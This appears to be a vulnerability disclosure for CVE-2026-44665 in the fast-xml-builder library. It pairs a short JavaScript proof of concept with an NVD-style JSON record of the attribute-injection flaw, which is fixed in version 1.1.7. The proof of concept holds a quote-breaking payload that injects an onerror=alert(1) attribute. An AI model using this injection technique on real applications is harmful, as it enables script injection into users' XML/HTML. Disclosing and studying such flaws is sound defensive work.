CVE-2026-44665

const { XMLBuilder } = require('fast-xml-builder'); // Vulnerable configuration scenario const options = { processEntities: false, // The vulnerability context ignoreAttributes: false, format: true }; const builder = new XMLBuilder(options); // Malicious input containing quotes to break attribute value const maliciousInput = { "user": { "@_name": "admin", "@_role": "user\" onerror=\"alert(1)\" x=\"" // Injection payload } }; try { const xmlOutput = builder.build(maliciousInput); console.log("Generated XML:"); console.log(xmlOutput); // Output in vulnerable versions will look like: // <user name="admin" role="user" onerror="alert(1)" x="" /> } catch (e) { console.error(e); }

{"cve": {"id": "CVE-2026-44665", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:59.093", "lastModified": "2026-05-13T16:53:33.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input data has quotes in attribute values but process entities is not enabled, it breaks the attribute value into multiple attributes. This gives the room for an attacker to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in 1.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-91"}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9", "source": "[email protected]"}]}}